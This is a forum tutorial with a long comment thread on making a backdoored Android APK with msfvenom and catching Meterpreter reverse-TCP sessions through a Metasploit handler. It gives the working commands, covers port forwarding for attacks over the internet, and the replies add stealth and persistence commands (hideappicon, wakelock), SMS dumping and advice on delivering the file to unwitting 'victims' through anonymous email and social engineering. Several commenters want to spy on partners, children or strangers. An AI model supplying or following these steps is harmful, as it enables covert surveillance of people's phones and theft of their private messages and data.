How To: Hack Android Using Kali (UPDATED and FAQ)

Hack Android Using Kali (UPDATED and FAQ)

Hello My Fellow Hackerzz.. This is my first How-to and i'll be updating the "Hacking Android Using Kali" to msfvenom and some FAQ about known problems from comments. So Here we GO!!

For Anything With a *, Please See The FAQ for More Info..


msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4895 R >/root/FILENAME.apk

-p => Specify Payload
LHOST => Your IP* or DDNS
LPORT => Port You want to listen on
R => Means RAW Format
>/root/FILENAME.apk => Location for File

NOTE – There Will be some error about architecture but its ok, let it be.
Easy As That!!


Now before running that app on your android phone, you have to start a handler. You can do that using –

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload android/meterpreter/reverse_tcp
  4. set LHOST *
  5. set LPORT 4895
  6. exploit

Now Run the app on your android phone and you'll get a meterpreter session opened!!
NOTE – Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.



It's really easy and almost the same.
First You Need to get your public IP. You can find that from THIS WEBSITE.
You also need your private ip. Use ifconfig command in terminal to get that.
Now There are just two small changes in the above steps

i) In the msfvenom command, in LHOST, you need to enter your 'PUBLIC IP'
ii) When creating a listener/handler, in LHOST, you need to enter your 'PRIVATE IP'
That's IT!!

NOTE – You Need To Port forward The Port you used in your modem/router or it won't work.

2) Apk File made from msfvenom is 0 kb

That means you have some spelling or syntax error. Please recheck the command you entered, if its correct, recheck again!!

3) In Phone – Cannot Parse Package

Try Another File Manager, Download a free one from google store!!

4) In Phone – App Not Installed

You May Need to Sign Your APK file, newer android versions may give error. Refer to this site, and go to last to see steps on manually signing. LINK HERE

5) Kali as Virtual Machine

Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!

If There's Any other problem, type in the comment!! I'll try my best to help!!

Just updated your iPhone? You'll find new features for Podcasts, News, Books, and TV, as well as important security improvements and fresh wallpapers. Find out what's new and changed on your iPhone with the iOS 17.5 update.


Hi se7enPeace,

For a first how to, congratulation! I love this tuto and I'll try it soon, thanks a lot!

How do you send the payload to the victim's phone without him knowing it was you?

Thats where social engineering and phishing comes in

. Phones have no anti virus software that works (unlesss user built/defined) i tested ever ant-virus phone app and they all failed to stop this backdoor from working.

open and send mail to victim anonymous. Thats it. Attach thr files in the mail.

this site doesnot work probably ...i have tried it to sent a text email and it was not sent

Hey there , I tried using the msfvenome command that you have mentioned but I am getting permission denied error please help

Guys do you know the reason why my meterpreter session closes when i block the screen of my phone?

try if you are connected with meterpreter (the phone)
to type the command: "wakelock" (without "")
additional is :hideappicon (don't forget underscore)
" hideappicon" will prevent the app from been detected by the user.
type "?" for more commands

Do you mean across wireless networks, not including website connections?

Yea I wrote in the title UPDATED haha :):)

Loved the tutorial... Everything executed like a breeze but one thing..
can you post a small tutorial on how to do it for this specific purpose of android hacking?

I need help when I done all thing write and going to exploit the session started and 2 and 3 lines of blue colour apered and said session started at job 1 and after few miniutes it says session closed and I again get msf(handler) in title to write command again

Good job. Worked perfectly after I signed my apk file.

Nice you got it working..

i did not get how to sign the app

hello Divy Jot, how are you?

Could you please help and tell me how you you sing the App? I really didn't get how to do it. Thanks in advance!

Great contribution! I'm looking forward to more tutorials from you, Se7enpeace.


Sure.. but I gotta learn too!!

Good job 7,

I see you used the comments and filed the common problems to make an FAQ post as people struggled to find the solution to their problems in the huge bundle of comments of the old post.

Excellent thinking!

Thanks man!! I learned from the best!! (You):):)

Glad you finally joint the creators!

I may recommend you provide more descriptions and a more soft style, but compact fits better sometimes.

Good luck with your next works!

I couldve written more but it would have then been a little messy... the one I wrote now is little noob-friendly too:):)

Thank you!!

can anyone put a article on how to hack android using stagefright ?
there are guides linked

Hmm, I try to solve the problem with the Vbox

Very nice articles!!

I try to install the app in my phone, but when i press install it does nothing at all! (android lollipop) i signed my apk(but not validated it) but with no avail. Any ideas/solutions?

Did you untick unknown sources in settings??
Try another file manager too!!

Hi, android lollipop has some security, its not gonna work on lollipop. I tried on my moto g. Session ends within seconds by itself.

I keep getting this error while executing the command:-

No platform was selected, choosing Msf::Module::Platform::Android from payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8206 bytes

Could someone tell me why this is happening?


i wrote in the howto that youll get this error!!
its no problem, your apk was created!! continue ahead!!

OK great. Thanks a lot sir!

I had the same issue, but I check as you mentioned and the apk was created. What's next? How do I send it to the victim? I am so lost of sending to the victim's phone. He's 10 blocks so I guess wifi, but what now? Can you list the steps please?

Loved the tutorial. Tried on devices but seems like some apps causing the session to end

Any way to bypass "Clean master" and other Antivirus apps installed in victim android device?

Thanks, Sumit.

thats a downsize... this guide is just to make a simple apk. you need to search about it. Need some android developer skills for that.

Hmm app just opens and closes as I have seen before but it doesn't connect to the listener...

EDIT: I have confirmed that I did things right.

Are you trying on lan or wan??

WAN. I do have portforwarding right. I have done other attacks over the same dedicated port before. On the listener I did my local machine's name (Its behind a router in a DMZ so maybe that is it?) I am going to try the router's IP

Did you try lan?? Does lan work??

You said in the listener you put local machine name??
I didnt get that..
Write the commands you executed for setting up the listener

Se7enpe Ace

I have been trying over and over.... I just use the LAN connection off my home router. All the steps are word by word what you wrote.

I can create the app, send it over to my android, and install it. I can see that the app is running on background, and I enter the exploit command.

The I tap the app to make connection but nothing happens......
Here is the series of commands and replay on my terminal:

root@kali:~# msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=4444 R > getinapp.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8285 bytes

root@kali:~# msfconsole

  • Failed to connect to the database: could not connect to server: Connection refused

Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" ( and accepting
TCP/IP connections on port 5432?

# cowsay++
< metasploit >
\ ,_,
\ (oo)__
(_) )\
||--|| *

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on

= metasploit v4.11.4-2015090201

  • -- --= 1476 exploits - 852 auxiliary - 239 post
  • -- --= 432 payloads - 37 encoders - 8 nops
  • -- --= Free Metasploit Pro trial: [

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reversetcp
payload => android/meterpreter/reversetcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

* Started reverse handler on
* Starting the payload handler...

and that's were it stays forever...... nothing happens....

Help please!!!!!

  1. Are you sure your mobile is connectd to the aame netqork as the pc??

2.Double check your lhost...

  1. Close the app in background.. type exploit... then tap the app to open...

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reversetcp
payload => android/meterpreter/reversetcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

  • Started reverse handler on
  • Starting the payload handler...

After that nothings happen....

Why this is happening whether I am using the same network for my android and my laptop bcoz when I see the public ip both devices my android and laptop give the same public ip.So What I can do.I also tried setting up VPN in my laptop but nothing happen.But in When I tried in Lan this s working but not in WAN It is not Working

Help please!!!!!

yo shuold create new incomming connection on ur pc...

sounds like youre not running the exploit before installing the .apk file, before you send the file to "victim" you open up the listener using msfconsole and then you send the .apk file and the victim installs it and it opens up the meterpreter session

i get an error ;APP NOT INSTALLED,tried on about 3 phones,hope someone helps me out

Did you try signing the apk??
I wrote in the faq:)

Sir, i get the samee app not installed error but have no idea how to sign the app. The link is too complicated with keytools and all can you detail it simply for me? Thank you very much

Has anyone had success with 5.1.1 (Lollipop)? I haven't had any success on my HTC One m7 running cynogen 12.1 so was thinking maybe this exploit has been mitigated in the latest build?

It doesn't work for Lollipop, they aded security in one of the builds and now when you try open a session the connection dies.

I got it to work on Marshmallow .. ONCE . After sometime the connection died and couldn't connect again .

need to hack cell phone remotely to gain text message evidence any advice ??

Have them install the apk..
Then just dump_sms in meterpreter

i have some question,why the victim will install the payload?could encode with some normal apk file ? or could it run as a background service when the android system start.

if i have many hacked android phone, how can i manage them?

in many articles about metasploit, it use a exploit , a payload, a encoder,but it just for study, not in real network environment

  1. Thats what you have to do.. if you want to merge it into another apk.. you gotta learn some android development or search about it..
  2. 2you can background a session and open another. There is no such way to manage..
  3. 3.yea its for study cause in real environment.. you got a firewall.. an antivirus and such things..

Hi, nice tutorial! I have a DDNS on my router and I want to hack on WAN, should I write the DDNS in LHOST or where? Thank you

Yes.. lhost=ddns.

hmm a few days before i create a payload with no problems. now i try a second one and msf allways creates a 0 byte file <.<

If its 0 bytes... there is a syntax error for sure.. I wrote in faq

yeah i read it, but i do it the same way like the last time and i look exactly :D cant fix this :/

Reply with the command you used..

here my command Sir msfvenom android/meterpreter/reversetcp LHOST= LPORT=4444 R > a.apk

can you help me ?

You are missing -p at msfvenom but the others are correct, i think, the full command should be msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=4444 R > a.apk

Correct me if i'm wrong tho, i'm still learning.

msfvenom -p android/meterpreter/reverse_tcp LHOST = YU IP LPORT=AS U LIKE R > /roor/Desktop/andro.apk

Sir I want to know I have no WiFi right now..can I do it with data connection ?

at first time I try its works. but after I close terminal and try again it doesn't work. why?? can you help it?

You need persistance..

If you didnt restart router.. and started a new terminal.. then you need to close the app on the phone and start it again

App died as soon as i open it on my android device...??

how to solve this problem?

It doest die.. it goes in background...
You will still get a session..

Hey.. i've tried to hack my android phone using my mobile network. But unable to hack. Aftter i read your post... i used to change in public ip and private ip but still unable to hack my android. it shows faile to bind....after execute EXPLOIT command??? Please help.

What did you write in exploit command??

Unknown command: msfpayload. :(

Msfpayload has been discontinued... thats why I made this guide for msfvenom ;);)

Instead of msfvenom just try venom

can we use any jpeg or mp3 file as an payload? instead of apk file?

Okay, this is REALLY starting to piss me off. I have tried several different tutorials and have gotten NOWHERE.

Everything works just fine until I start the exploit and then install the app on my phone. At which point nothing happens.

I tried switching to bridged but I have no internet connection when I do that. And when I type in ifconfig while on the bridged network, it only shows the local loopback ip, nothing under eth0:

ifconroot@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:8c:cc:78
inet6 addr: fe80::a00:27ff:fe8c:cc78/64 Scope:Link
RX packets:142 errors:0 dropped:0 overruns:0 frame:0
TX packets:31 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:13237 (12.9 KiB) TX bytes:5831 (5.6 KiB)

lo Link encap:Local Loopback
inet addr: Mask:
inet6 addr: ::1/128 Scope:Host
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)

Kali Linux 2 doesn't work in VMWare for me, I have tried installing it ove and over and every time I get to the point in the install where I am asked if I want to use a network mirror, every single mirror on the list fails.

I am sure being on public wifi doesn't help, either. If I use my phones hotspot capability and somehow figure out how to port forward, would I still use the bridged connection or nat?

The bridge filter software needs to work with the device driver for a physical NIC. A bridge driver doesn't have the necessary software work with it.

Using this in vmware is a terrible idea...not saying impossible but pain in the ass severally.. learn Kali install it on your computer just go through each mirror until one works you also can add these later in the config files after install. Youtube for help with kali mirror lists

i have did eevry thing u said but after opening the file i have sent to device and opened and the it says prasing error (there is problem in prasing the packages) need urgent hepl

Try another file manager..

i switched to bridged mode .. then when i came back to NAT mode kali linux failed to connect to internet

Sir , I have several doubts!

How can I edit the metasploit created app.......I had tried it to edit with android studio but the written text is not readable!

Please if anybody knows clear my doubt!
Also I want the created app to run on startup!
And last one ........... Can port forwarding possible if I am using android hotspot???
Thanks in advance!

I dont know about that.. but maybe you need to extract apk.. do the changes and compile it again...

Guys ..Please Help

When i Change to Bridged Mode , there is no ip address When Type ifconfig

Image via

The bridge filter software needs to work with the device driver for a physical NIC. A bridge driver doesn't have the necessary software work with it.

Started reverse handler on
Stared the pay load handler. its stuck on this.

Can you post a pic or text??

Can anyone help me with port forwarding???

i already searched Google and scratched my mind...but all i got is info about dynamic and static ip. Also searched about my ISP "Tikona Broadband" seems it doesn't provide port forwarding facility but not sure about it...

Used "pfconfig" tool to know about my router but it shows unknown but it shows my router ip.
my internal and external ip is dynamic & starts with 10.XXXX
Adding i don't have a router.
I am completely noob in port need help desperately..
Any kind of help will be appreciated...
thanks in advance.

Look at your modem and search for its name??

thanks for your quick reply...
i already checked its written Telnet but no model number.
it has only three ports namely Power,LAN, POE. Thats all.
its cheap one i think i got it from my ISP provider only.

Ok my bad , its just a POE data & power splitter..

and following pic is of my TELNET WIRELESS MODEM tikona company

so what about port forwarding!! any help???

Portforwarding is configured within the routers software. You access the gateway via your connection to the internet. Open web browser try Other routers are different consult your router documentation or look online.

Open the router config and tell me what alls there...
Its normally is not working...
see the whole setup is like follows-

The wireless modem is installed at my rooftop and a POE wire is attached to it ...other end of POE is connected to the POE splitter which is in my room , the LAN cable is attached in Splitter in LAN port (See the Splitter Pic above) ..The other end of LAN wire is attached to my Laptop..

Now when i power on the POE splitter a web page opens which redirects me to IP, it is tikona credentials webpage..there i put my login id and password. then only i can access internet...

pf config shows the router IP-10.24.xxxxx
but router model unknown

Well I guess then only your isp can forward it.. and if he says he cant.. yiu gotta find another isp.. sorry

On further research on my modem i found that it is a outdoor CPE-

Customer-Premises Equipment (CPE) refers to communications equipment that resides on the customer's premises whether it is a home or business. For example an Internet Service Provider (ISP) may have communications equipment such as a router or modem that is physically located at the customer site. An Outdoor CPE refers to a CPE device that is installed outdoors typically a wireless access point, wireless bridge, or wireless router.

In some cases a customer will buy a CPE device and in many cases they will lease or rent the CPE as part of a contract with a service provider.

Check the link-

ya i also think my isp can only change it.. well ok thanks

Well you can still do it on lan..!!

Guys .. Please I have the problem above ..please help me .. i just want to do it in LAN .. help please

there is no IP Address when type ifconfig

Image via

Does nat worked for u??

What exactly did you do??

when i installed Kali linux i Turned it off and just changed the mode from nat to bridged ..
and start up kali linux .. and when i type ifconfig .. no ip shown ..

You connected via ethernet or wifi??

i am running kali as virtual and i am connecting my phone with my pc wifi hostednetwork

Edit tab.. virtual network settings..

add or select your wifi adapter

I think that I have a serious problem ..

Have you tried changing the 'bridged to' dropdown menu to another adapter ? VMnet0 adapter doesn't seem connected.

Dont have a VM here to confirm full steps. Also make sure that your VM uses adapter vmnet0 to connect, and not the others (that's in the settings of your specific virtual machine)

is there any full topic talking about this problem ??

Just try switching to 'automatic' or set manually to your phisical LAN cable or wifi interface, make sure vmnet0 is selected in your VM. Restart virtual machine and that should work.

Or just google 'vmware setup bridged network' ... but that's what it'll basically say.

I say.. delete all the ones.. then add new one and choose your wifi adapter..

Use NAT again (for LAN only) and get a screenshot of the terminal with command ifconfig.

Hey! Everything worked out fine until the last bits, i typed exploit and ut binded and everything was fine but it wouldn't pick up the phone (Yes the app is installed and running in background), so i started to scroll down and see if there was anything like this and i spotted a comment saying to stop the process then type exploit and start it back up, but now it won't bind and it also still wont show my phone :c (Edit) I am running on virtual box and i am bridged also i am using ethernet.

now i have a problem parsing the package XD fuuuuu i had this problem before, they said to sign it or something like that.

Yea, you have to sign the APK to make it run.. Iin OP's guide, section FAQ point 4. There's a link with instructions.

messed up skills are phps very to send/share an apk file from my vb to host win7.

Vb ??
I didnt understand what exactly you want to do..

made an apk. file in virtual box kali.need to send that file to the target android over WAN .I,v windows 7 as my host how to shift the file from virtual box desktop to windows desktop???

ok made the .apk
signed it
followed everything correct , i think
installed the app on my phone (4.4.4 kitkat)
opened the msf on kali (virtual machine)
start the payload handler (followed the script above)
clicked on the app on my phone and then the check the payload handler and i see nothing

any ideas on what may have went wrong?
when i do ifconfig it shows my ip as, i also made sure i was bridged on the connection with the VM

Turn off any external Anti-Virus Firewalls, specially Avast's.
(Even if you are testing over LAN)

First close the app..
Type exploit... then click on the app..

Also check your lhost.. are you doing in lan or wan??

not working when using eth0 help plzz???

I address a problem between the communication of the smartphone and my PC. In the terminal that I used when I start the process, it stucks in: * Started reverse handler on

* Starting the payload handler...

I have port forwarded the port. The fascinating here is that when I check if the port is open (via )

I get this : Started reverse handler on
* Starting the payload handler...
* Sending stage (50643 bytes) to
* Meterpreter session 2 opened ( -> at 2015-11-02 14:19:02 +0000

  • Meterpreter session 2 is not valid and will be closed

- Meterpreter session 2 closed.*

Any ideas?

Probably, when you are checking for open port, that server will attempt to connect to your box, kali will do his magic thinking he's got a victim, but it's actually not a connection from a victim, so the payload sending fails and thus the message "session is not valid".

This simply means that you are doing port forward correctly. Go on with your test now, it should work over WAN.

I understood that. The server that checks for open ports kinda "deceives" the kali that is a victim, like you said. But it doesn't work with the phone and I can't understand why.

Did you try this in LAN ? What's the result ?
Is the apk signed / installed succesfully on phone ?

Can any one plz tell me how to forward the ports for wan? When am using lan its working perfectlybut not working over internet?

Search your router model + "port forwarding" on google..

I did but its not working, i think my router doesnot support external port forward

please help how do i port forward for WAN attacks because i dont have a router i use a modem ,and how do i check what port to make it listen to

Its same for modem...
Just search on google your modem name + "port forwarding"

i tried there is nothing on google about it ,however i have the WAN ipadress because when i open the modem settings on the browser using this ip it says its connected to WAN but not sure about port forwarding because there is no such option there

Just one question ..... I use internet in kali using my android hotspot...... Am i able to port forward in my android

Theroically it should be possible, tho I never tried so I cannot confirm. If you are able to make your android visible to the world (try with a simple http / ssh server, or any other server) you should be able to do that, given that you have root and knowledge of iptables.


After a month of heavy fighting with my ISP i managed to forward my ports, it seemed they had been blocking the ports :D

And WAN works fine but there is a new issue, After my session gets connected through WAN i can execute only core commands, Commands like cd, ls, webcamsnap etc wont work... any idea how to fix it ?

thanks in advance :)

i want to ask a question
how to make the application hide that he doesn't see it and

how to make the application start by itself and doesn't want to start it after installing it and thanks actually there is two question :D

Hay I am having a problem, after I install the app on my phone it wouldn't launch, I first thought that it just went into background so I checked on my phone settings whether it's running, it turned out that it wasn't

How do I make the application run on my phone?

i am using kali in virtual box and i wanted to try this on remote phone using mobile network.for that is it neccessary that i should do port forwarding.if so kindly teach me how to do it

@Se7enPiece Worked perfect for me on an old HTC Evo I have.

One question though, does the phone have to be rooted in order for this to work. My Evo is rooted so there wasn't any problems, but I'm just wondering.

its showing starting the payload handler since long time :(


see this is happening ... it keep showing this :( starting the payload handler

in place of ip can we use NO-IP ?

man iam using from neighbours wifi which i hacked....but i dont have access to router,, so i cant do port foreword
this means i cant use this or what ?

I myself am also getting stuck at rhe very end on starting the payload handler. Ive tried both times with LAN and WAN options all Getting Stuck. Ive follwed to the instructioms Perfectly. Im at a loss here

I did everything right above but at meterpreter terminal after typing exploit i am having this problem
Starting the payload handler...
* Sending stage (957487 bytes) to

  • Errno::ECONNRESET Connection reset by peer - SSLaccept

Help please!


Plz help me with the port forwarding step. I have TL-WR740N WiFi Router. I have forwarded port 4895. But when the app is opened on the device the session is not opening. BTW its working on LAN. Plz help me. See the pic attached with this comment for the information of the port forwarded by me.

if you don't have static ip then there is great chance that you are behind an another router or proxy.check ur wan ip in the status and check your ip on

but if you are using a static then check your firewalls.


I am a newbie .I am using Kali Linux in VMWare as guest OS.I hv Cable broadband with NO Router .How to do port forwarding ?And after showing "starting the payload handler " it shows nothing.


Also new and having some issue with this one. If someone can help me pin point the issue I would be very grateful.

I am currently testing on LAN but my port forwarding is setup either way.

I can get the app complied and installed no problem but as soon as I run the exploit command I get:

* - Meterpreter session 1 closed. Reason: Died

This happens instantly. If I click the app on the device again I get

  • Failed to load extension: No response was received to the coreloadlib request.

I have also had this pop up aswell

* - Meterpreter session 4 closed. Reason: Died

  • Invalid session identifier: 4

Any Ideas?

I tried it on lan and it worked but it didn't worked on wan (i used public ip in lhost and i also forward 8080 port to my machine) plz help me with this and can any one tell me how to install keylogger in this.(i tried keyscan command but there was no command like that)

Tnx for the post
sorry there was my isp's proxy server blocking me from port forwarding.
so i tried it with static ip and it worked like charm

bro you should also use your private ip in the listener commands

bro find the router model number
now type the brand name with model number + port forwarding in google
then you will come to know how to port forward

go to

i got msfconsole working at first time
but whenever i start it second time it gives me this error

  • Handler failed to bind to

Started reverse handler on
* Starting the payload handler...
stays like this forever
changed the port to 4895 and some other ports too
same error
but when in change the whole ip and port such as and other
does not give me a error
but how to change the local ip address
pls help thanks

hello sir.let me explain my situation in detail!
i use kali linux via usb
i have created the virus serverv apk and installed it in my phone
iam using lan
but i want to control that device any time whenever the device is also connected to internet
so what are the commands i should use for that

hey i just need to uninstall upgrade.apk in my smartphone. can anyone help me in this..

go to the settings u will find one app named "main activity" just uninstall it.

hello guys
i tested it!
but i have a problem !
i create the APK file and run it on my phone ..
sesssion created and when i send sysinfo command i get answer!
but when i want to dump sms or contacts or take a screenshot i receive a TimeOut Error ..
i check my network and I am sure that none of my Internet speed.
also i test it on other smart phone and it work carefully!!!
why this error has occurred?!
how i can solve this problem?
please help me to solve this problem!
Thanks :X

i want command to get whatsapp/facebook messages ..thanks alot

can we hide this app main activity ..

Thanks you very much sir,i have succeeded, Can you please tell me how can i handle multiple lisner?i mean if 2 devices intall my apk and open at the same time how i will handle them at the same time? Thanks

what port forward i can use with external ip ??? in local lan attack i use port 4444 , so what port should i use in public external ip attack ?? for forwarding ? and whats ip adress should i put in forward ??

hello, this can works in a android TV BOX ms8? , i already install a apk in the device , but doesn't works

Would love some help with this,

I input "msfvenom -p android/meterpreter/reversetcp LHOST=MyIP LPORT=MyPort R > /root/AppName.apk" and the out put is a 0 byte apk file (yes i know you mentioned it in FAQ).... any advice?

What I get in Terminal:
root@kali:~# msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=8080 R > /root/TestApp.apk

Hey when i try this on WAN my session keeps dropping. The connection is not persisitent. But it works perfect on LAN. See the attached screen for more details.

same problm bro ... did u funde the seloution !!

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (android/meterpreter/reversetcp):

Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadAndroid true yes Automatically load the Android extension
LHOST yes The listen address
LPORT 8888 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 8888
LPORT => 8888
msf exploit(handler) > exploit

  • Handler failed to bind to -

Started reverse TCP handler on
* Starting the payload handler...

then next process is not appear here what i do for this hack sir plz sand me massage

Hi, Tanks for the fantastic tutorial.
I have a question:
If I clean the terminal but the app is still running on the victim's phone, how can i re-connect to it?
Thanks a lot.

how do i choose the port for listening, can i choose to listen on any port example let say port 8080....please help

Thanks for the tutorial and FAQ , but i have 2 unsolved problems .
First one is that i just get core commands showing up , i dont have dump or other commands, whats the problem ?
Second is that my session keep going closed and die after few seconds ,
please help me !!

So you have to install it in your mobile first and then send it to your victims? Let's say my kid is 15 blocks from me at his school. How do I send it to the victim's phone? text message is too obvious...What other ways to do it?

i installed the app on my phone and used exploit
my phone and laptop are connected to the same wifi network
when i press the app on my phone it won't open and my terminal is stuck here

"msf exploit(handler) > exploit

  • Handler failed to bind to 185.*.*.*:**:- -

Started reverse TCP handler on**
* Starting the payload handler...
i stared out the IP and Port number"

Hey, first thanks for this how-to.

I follow the steps and almost all steps that I found over internet but I having some issues with the commands. All works fine, ports, apk,installation but I'm having facing problems with the commands; after I connect to my device and the text


shows up I try to use the command HELP and it only list CORE COMMANDS like BGRUN, CHANNEL ...etc. but none of

  • PS
  • Webcam list or
  • dumps...

any ideas?

I tried it in my Samsung Galaxy S6 running Custom Deoxed 5.1.1 Android

How did you send the apk file to your andriod? I am struck on that part? How do you do it?

sir please help me i want to hack android mobile which is on another network .
i m connected to internet through my mobile hotspot.
i used port forwarded app on my mobile. and set it as -
Incoming port on the device - 4444
Port on target device - 4444
Protocol- TCP

hey its great tutorial ! i ve port forwaded my router and in my host in windows and in kali linux ,but still wont work ,would u help me

hey guys plzzzzzz help me i did every step correctly and everything worked fine but when i open the apk in my phone it says application not installed can anyone tell me the fix for this pls

you must Sign your apk file
google it, its too easy

Can you tell me the steps how because I was doing it but I don't think it was working.

I first made the apk file, but are you suppose to sign the apk file on the kali linux terminal? or no? because when I was doing it the last step of signing it which is "$ zipalign -v 4 yourprojectname-unaligned.apk yourprojectname.apk" the kali linux terminal tells me that it cannot find "zipalign".

What should I do, and how do I know I have finished signing it?

am i doing port forwarding right ?

i use this cmd :

first LHOST = ( my isp IP )
second LHOST = ( IP in ifconfig )
LPORT = 4444 & 4895
when i exploit there is nothing...
just keep listening... i do any thing
and useful suggestion ?

I need help on signing the app. I had created the file and then I started signing the app by using this code

$ keytool -genkey -v -keystore my-release-key.keystore
-alias aliasname -keyalg RSA -keysize 2048 -validity 10000

$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1
-keystore my-release-key.keystore myapplication.apk aliasname

$ jarsigner -verify -verbose -certs myapplication.apk

$ zipalign -v 4 yourprojectname-unaligned.apk yourprojectname.apk

It tells me that it doesn't read "zipalign". By the way I'm using kali linux terminal to do this.

Please respond back asap.

Guy's anyone tel me is this app created using msfvenom is working on android version 5.0.2

hi i am yusufzinsaz please help me i created the apk but not installed in my phone and i go and search about sign apk but dont undrestand please help i follow your learn and my android device is 4.2.2 the file is runnig please please help help thanks alot bye

I have 2 things i need to share:

First, i got the connection but it was closed at the very instant so it doesnt make sense. Whats is even the point of doing the whole hacks if the connection closes at the same instant.

Another Important thing is that noone told what to do after that. Like, how to see the folders and files of a android device. How to see the videos, pictures in it? Please help! Dont leave us in dark!

can you explain in detail about the port forwarding part in the wan part?

In my case, meterpreter "sysinfo" command is showing as ;

and the android options are not present in "help" i.e. dump_calllog, wlan_geolocate

when i type those commands "dump_calllog" it shows unknown command.
Is the feature not available in some version or am I missing something???

Hey guys, wonderful tutorial. I was wondering if you had a hack for Android version 6.0.1 Marshmallow.

hey like i virus or malware in two android devices, how will i chose which device to hack , i think it has something to do with sessions

helo there !
nice job with the tutorial !
hope someone will answer this .
i have followed your instructions word by word .
i want to be able to connect to my target when shes not on same wifi network
so i followed de simple wpa stepts
i created the apk with my public ip from whatsmyipadress

then for the second stept in msfconsole i set up my host with the other ip , personal one from ifconfig.
added de port to port fwd list in my router
and nothing happens ....waiting for connections and thats all i get ....

any sugestions ?

does enyone managed to exploit true wpa ? cuz i dont and i dont know where im doing wrong

SE7ENPEACE, I tried it and i sent it to my Android phone to test it out but the session keeps closing and i can't make use of the webcam commands .

I don't know if it's because of my Android phone and my PC is on the same network (I'm share internet connection from my cellphone to my PC)..

What should i do?

I notice that, it only work when we both connect to the same network connection.

I loved that part about "In phone - Cannot parse package". Was hoping for some real solution but you just said "try another file manager"?! Really? So if victim gets this error he is supposed to install another file manager? So you FAQ is actually for both victims and attackers?

Hey if you're hacking on WAN who's port do you have to forward? Yours? or the victim's? (Suppose you're both on different networks)

what about a proper WAN hacking instruction for hacking from mobile to mobile. from mobile network on both phones

Thx for the toturial but when I open the app on my samsung galaxy s7 edge running android 7.0 i dont get any response in the terminal it just says starting thz payload handler so i think i dont get a meterpeter connection


I have created this accurately and was successful in installing on android. But the problem is, It does not connect to the pc. It stucks on

* Started reverse TCP handler on (My internal IP):(Opened port)
* Starting the payload handler...
but after sometime the error comes
* Started reverse TCP handler on
* Starting the payload handler...
* Sending stage (67614 bytes) to
* Meterpreter session 1 opened ( -> at 2017-05-20 18:11:42 +0000
* Sending stage (67614 bytes) to
* Meterpreter session 2 opened ( -> at 2017-05-20 18:11:43 +0000
* Sending stage (67614 bytes) to
* - Meterpreter session 1 closed. Reason: Died
* - Meterpreter session 2 closed. Reason: Died
* - Meterpreter session 3 closed. Reason: Died

With nmap I checked, port 80 was open on my router but not open on My victim.
plz help

how to hack victims phone if not on the same network?
Please Help

I tried using different file manage but I am still getting the PARSE ERROR. I ever tried 3rd party apk installers. PLEASE HELP ( ELABORATE ON YOUR ADVISE TO USE 3RD PARTY FILE MANAGERS)

hi i really need help here.
i have a meterpreter sessiopns opend on an android 6.0.1 and i cant do anything .i can just dump the sms .
and when i want to take a picture and screenshot or even dump contacts i get this eror

  • webcam_start: Operation failed: 1


  • androiddumpcontacts: Operation failed: 1

i really cant do anything els can anyone help me ?????? :(((((

Hi team,

Tried this steps got connections to meterpreter sessions also opened but ,when i tried to use the commands like check_root etc., that are mentioned above i am getting command not found issue..

can any one please help me out in resolving this issue

environment i been using is
kali linux os installed in a bootable usb pendrive ..

does it effect anything..?

also i couldn't entered the meterpreter console

I know I'm a bit late, but when I try to open the app on my phone, nothing happens neither on my machine nor my phone. I did the setup correctly, but it seems to be operator error. Is there something else I need to do? This is the first hacking attempt that I've done so far... Thanks in advance!

Recently, i was victim of this hack, my friend got access to my phone when i was at his house. but according to him, he cant access until i am connected on his wifi network. i just want to know is this really true?

also i want to end his control from my cell phone

If the "Main Activity" app is hidden then you can probably find it by using a file explorer such as "ES File Explorer" and uninstall it. If you are using ES File Explorer go to "APP" tab and it should be there.

hey thanks for this incredible article
i forwarded ports on my router , and tried to listen on any connections with nc
the problem is I dont have anything! I tried on different ports . still wont work

my router is AirMaster 3100V , I called my ISP and they said you need a static IP address which I believe is WRONG! you dont need a static ip to forward ports

i guess they're trying to shut me up LOL :)) Bastards
so how the hell Im supposed to open up ports on my router

i am not getting sessions have you any solutions

hi . sorry ... i did everything you said ,,, but in phone. it said (application not installed) ... what can i do? i dont know how. i dont know how to ready this file ... can you help me?

Hii there 7,
It is an awesome article. Everything works fine except for one thing:
when I'm in the meterpreter session, after sometime the session closes on its own showing "Reason:died"
I tried putting wakelock but results were the same.
Also I'm confused about how to do port forwarding for WAN. Can u help??
Thanks a lot!


can anyone show me how to do this attack useing a VPN or anything else that prevents my actual IP-Adress from being tracked? pls help me xD

Is there any other way to hack an android device at the same wifi network with you without sending an apk to install cuz im sure my target and mostly everyone will not open any apk.Plz tell me if there exist any method to do the hack in another way..Thnx

